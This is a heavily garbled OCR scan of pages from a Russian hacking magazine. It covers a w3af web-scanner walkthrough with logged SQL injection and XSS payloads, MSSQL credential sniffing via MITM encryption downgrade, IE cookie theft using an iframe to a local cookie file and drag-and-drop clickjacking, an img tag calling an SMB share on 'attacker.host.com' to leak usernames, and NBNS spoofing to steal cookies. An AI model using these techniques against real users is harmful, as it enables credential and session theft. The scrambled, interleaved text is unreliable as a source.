140 символами на одно сообщение стар ши й бра т. :1

Те стовое веб-nриложение обладает следую щ ими свойс тв ами:

основано на

LAMP ILinux-Apache-M yS QL-PHPI;

имеетфункцию n оиска и сервис nрив атных сообщений;

др у ги х.

З.

СКАНИРУЕМ ВЕБ-ПРИЛОЖЕНИЕ

реализованный в виде модуля webSpideг. Оisсоvег у -плагины за пу­

Gгер-nлагины nросты, но в тоже время очен ь nолезны, как и из в ест­

nолноценный достуn к функционалу nриложения nредоставляется

ная UNI Х-ут илита , в честь которой они на з ваны . Смысл та кой: через

только заре гистрир ованным и авторизова нны м nользователям;

gг ер -nлагин nро хо диткаждая пара НТТР -зап р ос/от вет, в которой nроизводится nоиск интересующей на с информации !номера

актив н оис nоль зуетАJАХ;

кре дитны х карт, вн утренни е IР -ад р еса, а др еса элек тронн ой nочты

и т. n.l. Эти nлагины также умеют искать учас тки nотенциально

имеет, черт nобери, уязвимости!

ХОЛОДНЫЙ ЗАПУСК

onacнoгoJavaScгipt-кoдa, наnример :

Для начала давай nросканир уем наше веб-nриложение без авториза­

document.write document.location eval

тр и, но это n ока небольш ой сюр nр из) и н терфейса:

ции- nросто натравим на него сканер. В wЗa f есть два ! в ообще, уже

gtkUi - графический, основанный на тулките GTK; consoleUi - хакерекий Ul для консольных старожи лов !конечно же, с удобным авто за вершением кома нд) .

4.

П од об ны е участки кода часто создают nредnосылки для р еа­

Будем исnользова ть nервый из них. Для заnуска GUI-версии на­

ли за ции атак вида ООМ based XSS l www. owasp . oгg/ i ndex.php/

бираем в консо ли <<./wЗaf_gui>> и видим что-то nо хожее на изображен­

DOM Based XSS).

ное на ск р иншоте

Вгu tеfо гсе- nлагины , как можно догадать ся, nроизводят nеребор

nр офиль, цель, nлагины и тулбар. Немн ого расскажу о nрофилях.

значений для ме х анизмов аутентификации НТТР

1. Гл авное

окно раз д елено на несколько секций:

Basic и для обыч­

ной формы для лаги на . Наnример , nлагин foгmlogin автоматически L.

детектир уетформ ы в хо да по сод е ржани ю в ни х двух nараметро в, о дин из которых им еетти n passwoгd. По сле об наруже ния тако й

формы сразу начинается б р ут.

5.

Аttасk-nлагины nредназначены не для nоиска брешей, а для их

экс пл уата ции. Они, как и др угие аддоны, используютобщую базу знаний о те ст ируемом nриложении, в ча с тности , они используют ин­ формацию о найденныхуязвимастях и пытаются их пр оэкс nл уати ­ ровать . Да-д а, именно эти nлагины могутnомочьдобыть заветный

••

.......

..

-

..... .. ...._.

ш е лл на бажном сервере. ;l

6.

Маnglе-nлаг и ны nозв оляютнал ету менять что-нибудь в за nро сах

ХАКЕР

03/158/2012

Структу р а в еб-nриложения

01,9


PCZONE

.

:::--CniМSiRSaiplngwMЬniC~JI'CГ. UJinO НПP 11181adGE1. f l'leS811diiiiW8S:

"limt= 15&\PCSCIFТ~Н")<ISC<Pf .... ть. ml)(thcl'*-wuv Tnisdnt!abllotyateasAU.Ьrowsen.. Тtis.,._~...asloundO'INNCf,IИIWiflid!905.

. ... C/OIIIillla!IID/III~ • • c-•.er~p~orq...._.ы~o~r

.. .. ""&""'"".-- - - Результаты сканирования wЗaf

Использование прокси-утилиты в wЗaf

Как можно догадаться, эт о именованные наборы настроек, которые

Suite,

можно загружать в wЗaf. П о сути, это in i-файлы, в которых ты можешь

«nо льзовательские прокси>> позволяют в реальном времени о т слежи­

сохранять nолюбившуюся тебе конфигурацию wЗaf, в том числе те­

вать [и даже изменять! НТТР-трафик между веб-браузером и веб­

стируемый

сервером. Конечно, подобный инструмент есть и в комплекте wЗaf.

URL,

выбранные и настроенные плагины, саге-настройки

и многое другое. Например, для сканирования ltteг я создал простой

или даже популярного аддона к Fiг efox - Таmрег

Data.

Такие

Вернее, такихпроксив нем целых две:

профиль под названием М у Pгofile, далее подключил в нем disсоvегу­

disсоvегу-плагин spideгMan;

плагины webSpideг и

интерактивный инструмент lnteгcepting Ргоху для ручноготестиро­

gгер-плагинов для

вания.

XSS-

pykto [порт знаменитого Nikto на Pythonl, пару поиска DOM XSS и несколько плагинов для поиска

и SQL-инъекций. Ч тобы начать сканирование, нажимаем Staгt

и ждем несколько минут, пока не появятся первые результаты. Кста­ ти, мы всегда можем наблюдать за действиями wЗaf на вкладке

Log,

Для наших целей будем использовать spideгMan, который, как мы

уже разобрались, представляет собой disсоvегу-плагин. П опробуем

куда в реальном времени выводятся информационные сообщения

его в деле. П одключаем плагин в главном окне и запускаем сканиро­

от ядра и п лагинов. Ход процесса отображается через прогреес - бар

вание. В веб-браузере в качестве пр окси прописываем

и другие идентификаторы.

[я использую для этого адд он F охуРгоху для F iгe f ox, по зво ля ющий

П ример н о через

минут сканирование завершается. Посмотрим,

20

127.0.0.1:44444

легко управлять проксями и переключаться меж ду ними! . SpideгMan

что удалось найти wЗaf. П омимо ошибок конфигурации Апача и кучи

будет запущен до webSpideг, так что последний сможет использовать

подозрений на

его результаты . Переключившись на spideгMan в нашем браузере, н е­

DOM XSS, сканер обнаружил несколько XSSI Одна из них, в /i ndex.php, представляет для нас особый интерес, осталь­ ные мы пока отложим. Плагин Pykto, в свою очередь, обнаружил доступную страни цу статуса Apache и phpinfo-cкpиnт /test.php. Другие плагины установили название и версию использ уемого веб-сервера

и веб-фреймворка. В нашем случае это

Linux

Apache/2.2.16 на DeЬian GNU/

и язык программировани РНР. Др угая полезная фишка, которая

позволяет нам лучше понять структуру веб-приложения,- это вклад­

ка

URLs с древовидной

картой веб-приложения и ее графическим

представлением. Здесь же можно просмотреть все НТТР-транзакции, сгенер ированные в рамках сканирования.

ПЕНТЕСТИНГ ВЕБ

2.0

Сейчас уже никого не удивишь играми, г рафическим редактором или видеозвонками через веб-браузер. Неотъемлем ой частью интернета стали веб-приложения, в которых логика выполнения запро граммирована на стороне клиента с активным использовани­

ем JavaScгipt,

AJAX, JSON, HTML5

и др угих названий и аббревиатур.

:1 Такой насыщенный комплекс технологий всё сильнее затрудняет автоматизированное тестирование безопасности веб-приложений. Прошли былые времена. Это история уже не о тестировании

обычно г о веб-сайта с множеством страниц вида /aгticle.php?id = 68, на ко т орых, в с вою о ч е р е дь , есть множество ссылок , форм и тому п одобного <<мяса>> для веб-паука. На жа в , как обычно, <Ctгi -U >,

чтобы п осмотреть НТМL-к о д , ты увидишь месиво из огромного куска JavaScгipt и немного тра д иционно г о

HTML. П одобный

много полазаем по тестируемому веб-приложению. В L оg-табе видим:

[Mon 30 Мау 2011 12:08:22 АМ MST] spiderMan proxy i s running on 127.0.0.1:44444. Please configure your browser to use these proxy settings and navigate the target sit e. То exit spiderMan plugin please navigate to http:l/127.7.7.7/spiderMan?terminate . [Mon 30 Мау 2011 12 :15 :29 АМ MST] The user is navigating through the spiderMan proxy. [Mon 30 Мау 2011 12:15 : 29 АМ М5Т] Trapped fuzzaЫe requests: [Mon 30 Мау 2011 12:15:29 АМ MST] http ://localhost /i ndex.php 1 Method : GET [Mon 30 Мау 2011 12:15:32 АМ MST] http://localhost/user-info. php 1 Method: GET [Mon 30 Мау 2011 12 : 22:36 АМ MST] SQL injection in а MySQL database was found at: "http://localhost/user-info.php" , using НТТР method GET. The sent data was: "id=d'z"0". Th is vulnerability was found in the request with id 3911. [Mon 30 Мау 2011 12 :27:10 АМ MST] Cross Site Scripting was found at: "http://localhost/index .php", using НТТР method GET . The sent data was: "limit=15&u=<ScRIPT> a=/UzmE/%0Aalert(a.source)</SCRiPT>" . The modified paramete r was "u" . This vulnerability affect s ALL browsers. This vu lne rabi lity was found in the request wit h id 4042.

«сайт» о ч ен ь

часто не по зубам веб -п ауку, построенному по классической модели.

Как видно из лога, чтобы остановить работу spideгMan, необхо­

Это вообще очень интересное направление для развития средств

димо перейти на специальный адрес, после чего webSpideг и другие

тестирования безо па сности веб-приложений. Ведь непонятно, как

плагины примутся за дело. Так , аудит-п лагины обнаружили

в такой ситуации автоматизированно обойти весь сайт - встраи­

и ХSS-инъекциюl П ервая дыра, оказавшаяся как раз в АJАХ-запросе,

вать полноценные

была упущена во время первого сканирования.

JS

и рендеринг-движки? Использовать подход,

Добавлю немного про эксплуатацию найденных ба го в . WЗaf умеет

подобный Selenium/Web Dг iveг? Дл я тестирования п од обных приложений не обойтись без специализирован ны х прокси, т аких как

050

SQL-

OWASP WebScaгab

и В uгр

эксплуатировать некоторые виды уязвимастей и, к примеру, может предоставить тебе заветн ы й шел л на целевой машине. Для эксплуа-

ХАКЕР

03 /158/ 2012


Фреймворк д ля п ентестера

..

тацииобнаруженнойуязвимостинадопростоперетащитьсоотве~ ствующий эксплоит на вкладке

Exploit

на уязвимость. Д ля эксплуа­

тации SQL-инъекций используется наверняка знакомый тебе

.

---........

РУЧНОЕ ТЕСТИРОВАНИЕ Отправить НТТР-заnрос в нормальной операционной системе можно

в конце концов,

-

sqlmap

[sqlmap.sourceforge.netl, встроенный в wЗaf.

с помощью множества способов: Telпet,

~

cURL, Wget, Python + urll ib,

:1- выбирай, ч т о больше по душе. В wЗaf для этого

предусмотрены специальные удобные инструменты. П ослать пачку однотипных НТТР-запросов с разными значениями одного из пара­

метров? Пожалуйста! Генерировать соответствующие токены можно на том же Pythoп. С помощью редактора НТТР - запросов, в котором есть даже простая п одеветка НТТ Р - синтаксиса, можно отправлять одиночныезапросы . Ч астовозникаетнеобходимостьвыполнить

Пол у ча е мш е лл че р ез S QL-инъекцию

кодирование какой-нибудь строки в

URL или просто посчитать МО5сумму. Конечно, можно быстро набрать «echo -п "admin" 1 md5sum>>

:1 Как ты уже дога­

в консоли, но использовать для этого встроенный кодировщик немно­

Бинго! Обнаружена классическая SQ L-инъекция .

го удобнее. П ри раскрутке очередной слепой SQL-инъекции важно

дал с я , эт о з апускаются всё те же плагины, которые ты выбираешь при

различать между собой ответы веб-сервера , для чего тебе наверняка

об ычном ск анировании.

пригодится встроенный

diff.

Для поиска «слепых>> с кулей тоже есть специальные плагины. Вы­

Ну и наконец, если ты « вайтхат >> или про­

сто аудитор безопасности, то заказчику пентеста надо по казать, как

ключим вывод ошибок в настройках РНР и попробуем задетектить т от

«работает»уязвимост~используявозможностьзкспортазапросов

ж е ба г, но уже вслепую. С помощью НТТР-редактора посылаем пару

в форматы

з апросов к нашему веб-приложению: /useг-info.php?id=1 и /useг-info.

Python. Иными словами , можно сказать: «От­ на жмите .. Сабмит " и смотрите, как появляется

HTML, AJAX

кройте вот эту форму,

и

p h p? id=1 % 2Ы , а затем передаем р езультаты средству для сравнения тра нз акций. В результате при вып о лн е нии SQL-зaпpoca срабатывает

JS-сообщение ... >>

пр ос тейшее алгебраическое выражение, и мы получаем два разных

Р ассмотрим типич н ый сценарий использования этих инструмен­ тов . Запускаем прокси и шаримея по и с следуемом у веб-приложению

отв е та [информация дл я р а зны х польз о вателей!. Дальнейшим шагом

[не забываем включить проксирование трафика в бра у зереl.

м ож ет с тать всё та же э кс пл у атация с к ули .

На вкладке Histoгy видим отображаемый в реальном времени НТТР­

OUTRO

трафик между браузером и сервером. В случае с более мощным при­

ложением, например чатом , транзакций будет значительно больше.

WЗ af- это действительн о мощный фреймворк для тес т ирования

В такой ситуации как нельзя кстати будет хороший фильтр : с его

б ез опа с но с ти веб-приложений . Рас с казывать о нем можно долго ,

помощью можно, к примеру, выводить только транзакции с такими за­

п о этом у я ставил перед с о б о й задач у по казать его в действии.

просами, которые содержат параметры в строке << Запросы>> и на кото­

Важно, что это не прос т о очередной сканер безопасности, а именно

рые был получен 2хх-й ответ.

фр е ймворк, большое количество дополнений тому доказательство. К тому ж е для человека , на базовом у ровне знающего веб и

Вернемся к нашему приложению. Во время навигации по нему

Python,

замечаем, что при наведении на аватар пользователя появляется

не со ставиттруда добавить недостающий функционал или проверку.

всплывающее «окно>> с информацией об этом пользователе. Эта

К с тати , как и любому свободному проекту, wЗaf нужны новые раз­

информация выдается в результате обычно го АJАХ-запроса к

ра б отчики, тестировщики и просто активные пользователи. Кого

/useг-info.php?id = 1, что видно в истории запросов . Давай протести ру­

з т о з аинтересовало, добро nожаловать в соответствующий список

ем этот скрипт на уязвимости. Для нашего запроса в меню выбираем

рас с ылки [ wЗ af . souгce f oгge . ne t l либо на IRС-канал #wЗaf в сети

«Audit

гequest

with ... >>- нас

интересует, есть ли там SQ L-инъекция .

Fг e enode. ::х::

ld:47

ld: 46

LАутентификация J

~~-----..

[ Сбор ссылок

GЕТ http :/Jloca.lhost /u ser - i n fo .~p 7id-1 НТТР/1.1

~

Accept -l.angu•: en-us,en;q-e.s Accept-encodi ng: identity Keep-alive : 115 Accept : text/htlll, арр lication/xhtlll+XIIl, арр licat ion/XIIl: q..e. 9

user-agent : Нozilla/S.e (Xll; Linux i686; rv:2.&.1) Gecko/Z81 Accept -charset : IS0-8859 - l, ut f -8; q-e. 7, • ;q-e. 7 Нost: localtюst

Refe re r: http://localhosttindex.php Cookie: PНPS ESSI D-гf 7vdbs j ist7is3j6 rlc3p462S

Proxy- connect i on; keep- а li ve

~GЕТ h t tp ://loc al ho s t t u ser- in fo. php 7id· 1~Bl НПР/ 1 . 1

Accept- l anguage: en-us,en;q-e.S Accept-encoding : identity Keep-alive: 115 Accept: text/ht.l,application/xhtii\+XIIl ,application/xlll ;q..e. 9 , .-, . ;q-8.8 User-agent: t10zilla/S .8 (Xll ; Linux iб86; rv:2.8. 1) Gecko/28118438 Firef o Accept -charset: IS0-88S9· 1,utf -S; q-8. 7, • ;q-e. 7 Нost: localhost Referer : http://l ocalhos t /index. php Cookie: PНPS ESS I D• rf 7vdbs j ist7 is З jбrlcЗp462S Proxy-connection: keep-alive <style>

<style>

"' (height:

"'( height :

ерх; Ьorde r : 8рх; Ьorder-top:

</ style> <tаЫе Ьo rde r- " 8 "

<tа Ые Ьогdег-· е· с е\ \sp<~c i ng- " S " c\ass-· userТaЫe">

~ <1: Г><t d> Fi rs t natlf!: </td><td>Jaii'IE!s</td></t r> <t r><td>Las t na~~e : </ td><td>Bond</ td></ t r> <tr><td colspan• "2"><hr />1 like Vodka ... shaken not stirr <t r><td co\s an•"2 "><hr /><а href• "/IIIE!ssages .p_h ?to•jai'IE!s </t r> </table>

1Sellext lo compare J

ХАКЕР

03 / 158/ 20 12

Ipx solid gray;

1

1 </sty\ e>

Модель работы класс и чес к ого ск анера уязвимостей веб - прило ж ени й

ерх;

Ьorder: ерх; Ьorder-top:

l px solid gray;

~

cell spacing•" S" cla s s-~ us e rТaЫ e "> <tr><td>Firstnane: </td><td>A\isa</td></ t r> <1: r><td>Las tnaii'IE! : </td><td>Se lezneva</td></t r> <tr><td colspan•"2"><hr />Spacegir\1 J! !</td></tr> <tr><td cols an•"2"><hr /><а href• " /IIE!ssages . ~h~7to-alisa " >Send Priva </ t r> </tabl e>

[<lo::J o12

Утилита и з состав а wЗ af для сравнения НТТР-т ранз акций

051


ВЭЛОМ/ЕАSУ НАСК

Алексей «GreenDog » Тюри н, Digital Security ltwitter.com/antyurinl

ОТСНИФАТЬ ПАРОЛЬ ПРИ АУТЕНТИФИКАЦИИ В

MSSQL

Ef.3Jf..i!f.·l ъ--

Microsoft SQL server- это

одна из самых распространенных СУБД.

2.

Шифрование доступно , но отключено:

ENCRYPT_O FF- ОхОО. ENCRYPT_ON - Ох01. ENCRYPT_NOT_S UP - Ox02 .

Шифрование доступно и включено:

З.

Шифрование недоступно:

Как и многие другие продукты

Microsoft, SQL server предлагает два вида аутентификации : integrated [sign-on], то есть аутенти­ фикацию п о виндовой у ч етной записи, и native, то есть классиче­

4.

Шифрование требуется: ENCRYPT_REQ-OxOЗ.

скую, по логину и па ролю. Оба способа используются довольно

тря на название, шифрование при таком значе нии используется,

часто.

но только для процесса . А вот когда стоит

По дефопту данные, передаваемые по сети, практически

шифрование не используется совсем. Таким образом, мы вполне

не шифруются. Если точнее, то шифруется процесс аутентифи­

можем осущест вить классическую МiТМ-атаку и, подменив данные

кации пользователя, а сами данные- нет. Конечно, для атаки

всего лишь в одном па кете, полностью отключить шифрование

этого было бы достаточно. Зачем нам логин и па роль, если мы

и отснифать аутентификационные данные.

Давай рассмотрим две ее особенности.

1.

1. 2.

г

По дефопту устанавливается значение

ENCRYPT_O FF.

Несмо­

ENCRYPT_NOT_SUP,

Кстати, автор этого исследования довел всё до логического

можем на лету поменять запрос или получитьданные , всего лишь

устроив arp-spoofiпg между сервером и клиентом? Затем, что это

конца - создал модуль для

не самое про стое дело - подменять что-то на лету. Поэтом у по­

за нас и сделает. Только , думаю, з десь стоит отметить одну особен­

Metasploit Framework,

который всё

ность. В описываемом случае модуль не меняет данные на лет у,

пытаемся вытащитьлогин и пароль.

а поднимает ТСР-порт, и только с него данные редиректятся

Не так давно некто под ником fOrki изучил этот вопрос [!J.i.LЬ'L s8g07r l. Посмотрим, что же он выудил. Дл я начала то, что дан­ ные MSSQL передаются в форма т е Tabular DataStream protocol

на MSSQL-cepвep за счет еще одного соединения, созданного уже атакующим, что, тем не менее, не создает особых проблем. Всё, что

требуется, - з т о организовать редирект трафика, приходящего

[ bit . ly/z З oVPR I. Н о сам этот пр отокол не поддерживает шифрова­

на хост атакующего после arp-spoofing-aтaки, на соответствующий

ние . Как же так? Откуда зашифрованные п акеты авторизации?

локальный порт. Но и эту за дачу

После непродолжител ьны х мучений с

в свой модуль небольшой shеll-скрипт.

Wireshark fOrki

обнаружил

автоматизировал, добавив

fOrki

довольно интересную вещь: для шифрования здесь использу­

ется обычный

SSL [с самоподписанным сертификатом], который TDS . Нестандартное решение. Но это не так

-----

-

- -

--

-

-

~--------

работает вн утри

важно. Самое интересное- это настройка ТDS-соединения, так называемого пакета

PRELOGIN . Он

-

-----

задает разнообразные

настройки и в том числе указывает, будет ли использоваться шифрование. За шифрование отвечает поле рое может принимать сле д ующие значения:

052

- - -

ENCRYPTION,

кото­

------------

-

-

- - - -- - - - --

Выбор метода на основании флагов, установленных у клиента и сервера

ХАКЕР

03/158/2012


EASY

УГНАТЬ КУКИСЫ С ПОМОЩЬЮ

UI-REDRESSING

НАСК

......... ·Jйи г

В декабрьском номере][ мы познакомились с такой вещью, как

clickjacking.

о -·

Сrатья была очен ь полезной, но автор не упомянул об

одном замечательном трике. На самом деле название

т

~ Р - ~ - G~ ·

Adcms iQ c:'iOocunert:sns.ttnat~

clickjacking ui-

не совсем точно отражает суть атаки, и мне кажется, что

это более правильное nонятие. И техника , которую я

redressing -

.,_

опи ш у ниже,- самое яркое т ому подтверждение.

Итак , n озволь представить тебе технике рассказал

cookiejacking. Впервые об этом Rosario Valotta на HITB в Амстердаме в 2011

7iS9l003 .Z<19775128.132514ИЭ9 .132 . account.в .9CJ09le. соа/ >600

году. Потенциал техники огромен- nросто пред с тавь , что с ее по­

888086656

мощью можно nо хи тить куки от люб о го сай та , даже от защищенно­

ll3080 1SS Z

30191238

го НТТРS-протоколом! Однако здесь есть небольшее ограничение :

работает она только в

о

D

IE !но зато во всех версиях! . Теперь давай

Во-первых, он использовал

IE.

0-day,

которая имеется во всех

С виду это не такая уж и с трашная дырка, а потом у ее

не особо стремились пропатчить. Как ты уже знаешь, в

st..edDotunerts

~ Мy((ЩIII:et"

_,;j...,__."""

посмотрим, что же п редлагает нам этот И Б-специалист.

версиях

.....- .

IE

Об х од кр осс- зон но й политики и доступ к локальным кукисам из зоны интернет

есть

узлы. В разных зонах действуют разные настройки безопасности.

Rosa rio это мячик! в другой !сетка!. Под мячик мы прячем наш iframe с кукисам и, а на самом

Н аn ри мер, описанная выше автоматиче ска я NТLМ-а утентфикация

сайте создаем обработчик для переносимых данных. Н о и это еще

такая фича, как разделение на зоны:

д ейст вует дл я уз лов зоны

lntranet

lnternet, lntranet,

доверенные

и выше. Вот сnисок зон, отсо­

- перетащить один элемент !в пример е

не всё . Нашему

iframe

мы добавляем свойство

scrollspeed

с большим

значением. Это необходимо для того, чтобы клик, совершаемый

ртированных в nорядке уменьшения привилегий:

пользователем, превращал ся в о перацию выделения за счет само­

стоятельного перемещения lпроскролливанияl

Local Machine Zone Local Intranet Zone Trusted Sites Zone Internet Zone Restricted Sites Zone

iframe из самого

верха в самы й низ. Таки м образом, получается, что пользователь во время клика на самом деле выделяет текст в мячик в корзину, перемещает это т текст

iframe, а перемещая drag & dгор'ом, в итоге пере­

давая текст хакеру. Возможно, что на словах всё это звучит не очень понятно, но как только ты посмотришь видео на сайте

Rosario Valotta

С безо п ас н ос т ью и зонами связан еще один момент- правила

I Ьit .l y/iN xvT Ь) , то сразу поймешь логику метода и, в частности, техни­

кросс-зон ног о взаимодействия. Согласно самому общему прави­

ки сопtепt extractioп, даже если ты не знаком с

с более привил егированной . Та ким образом, вызов кода

<iframe

JavaScript.

Думаю, что теперь общая идея атаки ясна . Однако у нее есть

лу, ме н ее привил егирован н а я зо на н е может взаимоде йствова ть

несколько нюансов. Во-первы х, эта атака работает на всех ОС

кук и. Таким образом, на стра ниц у сайта зоны интернет можно

Windows, что и создает проблему :1. Файлы кукисов в ХР и в Vista/7 лежат в разных местах . Для ХР это C: //Documents and Settings/%user_name%/Cookies, а для более новых версий винды -C: /Users/% user_name %/AppData/Roaming/Microsoft/Wi ndows/ Cookies. Тем не менее, э т а « проблема » решается достаточно просто,

встав ить с лед ую щий фрейм:

ведь большинство браузеров отправ л яют в каждом за пр осе заголо­

src= "file: // c :/boot . ini " >

со страницы зоны интернетприведет

к ошибке дост у па. Уязви мость

0-day

состоит в том, что кросс-зонная политика

не действует для оnре д елен ны х файлов, а именно для файлов

вок User-Ageпt, который очень часто включает в себя и версию ОС.

<iframe src= "file :///C: // Documents and Settings / %user_name%/Cookies /%user_name%@google[l].txt " > </iframe>

Кроме того, для опре дел ения версии ОС можно воспользоваться тем же

JavaScript.

Во-вторых, как ты , я д умаю, заметил , нам необходимо

знать имя пользо вателя на его компьютере, и это главная про­

Здесь % user_ пame % - это имя пользователя в ОС. Куки же

блема. Для ее решения можно попытаться заставить пользователя

у каж дог о п о ль зователя свои, п оэ то му хра нят ся они в личных п ап­

подключиться по протоколу

ках . Пр и мер, иллюстрирующий чтение кукисов

передает имя пользователя наряду с другими полями. Дл я этого

Google,

ты сможешь

SMB.

Пр и подключении по н ему клиент

на ядовитую страни ц у требуется добавить вот такой простейший

уви деть на скриншоте.

Во-вторых , кроме 0 -d ау - бага, автор использовал специальную

extraction lпредстав ­ лена П олом Стоуном на BlackHat Europe - 2010, goo.g i/ZBYNw l. Зачем? Хо тя мы и подгрузили в iframe файл с кукисам и, однако

кoд:<img

технику clickjackiпg·a под названием conteпt

src= " \\attac ker.host.com\ any . jpg" ></ img >.

Конечно, еще потребуется поставить обработчик запросов

на

445

порт, а затем организовать его взаимодействие с wеЬ ­

сервером. Как видишь, описанный метод просто шикарен! Однако

получить д ос т у п к данны м в н ем мы не можем. Здесь д ействует

возможности е г о использования чаще всего огра н ичивает филь­

кросс-д омен ная политика , ведь наш сайт находится где-то в сети,

трация такого трафика на сетевых устройствах . К тому же з д есь

а в

встает еще одна проблема. На дворе уже весна 2012-го, а

ifram e у

нас сидит

localhost

пользователя.

Суть этой специальной т ех ники достаточно проста. Все совре ­ менн ы е браузеры поддерживают

drag & drop,

с п омощью которого

пофиксила у язвимость в

Microsoft

IE

Microsoft

еще в начале осени 2011-го. Кроме того,

внесла изменения в наименование кукисов в файловой

пользователь может перенести данные с о дног о сайта на др угой .

системе. Теперь их названия лишились п о н ятного удобочи т аемого

Таким об ра зом, юз е р , по сут и , копирует данны е в о дн ом месте

вида user_пa meradomaiп[couпter].txt и с т али похожи на буквенно­

и вставляет в другое . Кросс -дом е нным п олитикам з д есь придраться

цифровые рандамы вроде 87ТVLB D W.txt. П оэтому обратиться к ним

не к чему. Так вот, сопtепt extractioп - это, проще говоря , несколько

напрямую так просто уже не пол учи тся. Впрочем, по статистике,

извращенный

очень малое число поль зователей заблаговременно обновляет

drag & drop. Заманив

на ядовитый clickjackiпg-caйт

нашу жертву, мы предлагаем ей, например, поиграть в игру. Ее смысл

ХАКЕР

03/158/ 20 12

с вои браузеры, особенно если речь идет об

IE.

053


ВЗЛОМ/ЕАSУ НАСК

СОБРАТЬ ИНФОРМАЦИЮ РЕШЕНИЕ

SkiJJ Tracino Framework

Сбор информа ц ии яв л яется о д ним из важнейших этапов при про­

;\ ' Ift'(' '•\ , 1 1 \

l

J(r~>r

,J 1'l tlll , ' ' , о..; 1'1,

.. t l

"it .._

ведении ауДита безо п аснос т и lну или атаки). Ведь нам необходимо найти самое слабое место и затем попытаться захватить через него всю систему. Но зачем иска т ь сложный путь, если самым слабым местом любой, даже самой защищенной системы является чело­ век? Ты наверняка знаешь о существовании такой замечательной

DNS command Une

вещи, как социальная инженерия. Е е результативность напрямую

***'*

WeЬsfte

зависит от доступной информации о человеке, поэтому тысячи

*** IPNelghЬors

специалистов и проводят различные исследования на эту тему.

***,

Однако в России такой т ен д енции пока что не наблюдается, так

Spamllsts

***•

как наши пользователи си д я т в основном только в Одноклассниках

MaШngllsts

и В Контак т е, д а и про ц есс информатизации еще просто не доше л

***

DNS lnformetion Gathering command line • Flen:e Domllln scan i:J

****; **** • DNSEnumtooi GI ***i • S dlg ~ns.domaln .com domaln.com AXFR ***

• The Н.rvester comm.1nd llne tool Q

Q

Machinespeclflc

до большинства ведомст в . В любом случае я думаю, что тебя за­

и��тересует ссылка

lntorm•tlon

tools

***;

makensi .es/stf. Автор этой страницы не поле­

нился собрать в одном месте не плохую коллекцию всевозможных онлайн-сервисов, которые могут пригодиться тебе в процессе взлома или пентеста, чтобы получить всю необходимую информа­ цию как о человеке, так и о всей подопытной системе.

О nреде nя ем nлаги ны

WordP res s

НАЙТИ АЛЬТЕРНАТИВУ DNS И ПРОСПУФИТЬ NETBIOS

li•iaf..i!!f.ll т ·лw т

е с ли в файле нет nри вязок, производит запрос к D NS - cepвepy. За ­ Всем нам известно, что для определения IР-адресов по именам

те м

используется протокол

Здесь следует уточнить, что

заботы о безопасности !тогд а существовали более важные зада­

NetBIOS Name Seгvice. NetBIOS входит в Windows по дефолту, а NetBIOS Name Seгvice INBNSI- это тот же протокол, только

чи), поэтому в настоящее время в нем есть множество недостатков

предназначен он для установки соответствия между NеtВIОS­

с точки зрения безопасности . Однако на смену ему идет

именами и IР - адресами. В процессеработы этот протокол либо

ONS.

Протокол проектировался без особой

DNSS EC,

Windows

использует такую штуку, как

и я надеюсь, что си т уа ц ия изменится в лучшую сторону. Сами не­

использует специальный WINS-cepвepa, либо отправляет широко­

достатки

вещательный запрос в сеть !думается, теперь идея атаки понятна).

DNS

наиболее сильно проявляются в локальных сетях,

Но вернемся к еще одному важному моменту- D NS-зanpocy

особенно если мы можем прово д ить атаки типа aгp-poisoning, позволяющие п росматривать и мо д ифицировать трафик, которым

к серверу. Если сервер ответит пользова т елю, то за п рос по

обме н иваются жер т ва и се рв е р . Н о д авай предположим, ч т о

уже не будет отправлен . А как же DNS-cepвepy н е ответи т ь, ес л и

NBNS

по каким-то п ричинам всё э т о нам не д оступно, хотя мы и находим­

интересующий пользователя сайт ХХХ.СО М и м ее т ОN S-за п ись?

ся в одной лока л ке с жертвой . П усть, например, в сетке при­

Здесь мы можем воспользоваться возможнос т ями современных

сутствует некая

браузеров : поиском из адресной строки и подстано в кой доменов

105,

и мы совсем не хотим, чтобы кто-то заметил

нашу хакерскую активность . Тогд а нам нужно действовать тихо,

верхнего уровня

используя только стан д артные возможности протоколов. Уточню

привыкают вводить то, что их интересует, прямо в а д ресную стро­

l.com,

.гu) . Как именно? Сейчас пользователи

задачу. Нам необходимо перехватить куки, передаваемые пользо­

к у, но браузеры не всегда могут понять, хочет ли пользователь

вателем на абстрактный сайт ХХХ.СОМ. Изначально может пока­

что-то найти в поисковике или просто открыть сайт. Е с т ь, конечно,

заться, что задача не имеет решения, но давай рассмотрим, каким

определенные паттерны !например, пробелы в адресной строке),

образом ОС

Windows

но гораздо чаще браузерыв первую очередь резолвя т имя только

определяет IР-адрес сайта. Первым делом

система проверяет статическую привязку

IP к

упомянутым выше способом . Что еще интересней, при отправке

именам, хранящим ­

ся в файле hosts IC : \Windows\System32\dгiveгs\etc\hosts). Д алее,

• FiltEr: J(chs ог No.•

' 1,..

Заnрос

051.

.

48313 . 763879 485 13 . 786589 493 13 . 90'3700 494 13 . 905520 528 14. 65 5488 570 15 . 405637 URL в

...

nros ) and ip.addr

1 Time

1Destnation

1Source ~

DNS-зanpoca к введенной пользователем строке добав л яется

2 123 2 123 123 123

=

Ejp'ession ... Cleat Арр!у 1 ProtDcol

123 2 123 255 255 255

ONS DNS DNS NBNS NBNS NBNS

lmro

. .. .

Standard query response_. NO such Standard query А makaka. stanoard query response, No such Name query NB МАКАКА<00 > Name query NB МАКАКА<00> Name query NB МАКАКА<00>

nате

nате

браузер е nоро ж дает nачку ра з личны х заnросов для резолва и мени

ХАКЕР

03/158/2012


EASY

127 128 162 163 185 186 258 259 319

368.190841 368. 427678 423. 172957 423.407005 442.487183 442:734222 666. 150204 666. 381655 727. 267776

192.168.0.101 192. 168. о. 102 192.168.0.101 192. 168.0.102 192. 168. о. 101 192.168.0.102 192.168.0.101 192.168.0.102 192.168.0.101

192.168.0.255 192.168 . 0.101 192.168.0.255 192.168.0.101 192.168.0.255 192.168.0.101 192.168.0.255 192.168.0.101 192.168.0.255

NBNS NBNS NBNS NBNS NBNS NBNS NBNS NBNS NBNS

92 104 92 104 92 104 92 104 92

Name Name Name Name Name Name Name Name Name

query query query query query query query query query

НАСК

:00> NB ?? response NB 192.168.0.102 NB iiiliiiliiiliiil lliiilll RU<OO> response NB 192.168.0.102 NB .GOOGLE.COM<OO> response NB 192.168.0.102 NB .-RU<OO> response NB 192.168.0.102 NB AASDASD 8188RU<OO>

N B NS- cn yф ин r в д ейст вии

определенный суффикс, в результате чего получается полное до­

4.

Запускаем : run .

менное имя .

Вернемся к краже кукисов. Итак, используя NВNS-спуфинг, мы

